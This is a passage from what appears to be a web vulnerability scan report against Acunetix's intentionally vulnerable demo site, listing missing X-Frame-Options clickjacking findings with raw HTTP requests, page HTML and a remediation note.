          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a>
          						<DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.

        7. GET http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 13914
          
          
          Response body (13914 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WBB8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhHwAFElJlYWROZXdzLmFzcHg/aWQ9M2QCBw8WAh8BBagBMjYgSmFudWFyeSAyMDA1IC0gQSBiZXRhIHZlcnNpb24gb2YgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciBoYXMgYmVlbiByZWxlYXNlZCB0b2RheS4gVGhlIGJldGEgaXMgYXZhaWxhYmxlIGZvciBkb3dubG9hZCBhdCBodHRwOi8vd3d3LmFjdW5ldGl4LmNvbS9kb3dubG9hZC8uZGQzP/MHHnstJY/fWtD4cYSdoYkheQ==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQLj8dP9DwKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9dpx0P1QE7KvkQnKR4Ij212SQ8lw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<a href="ReadNews.aspx?id=3" id="anchNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a>
          						<DIV id="divNewsShort" class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.

        8. GET http://testaspnet.vulnweb.com/default.aspx
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (316 bytes)
          GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
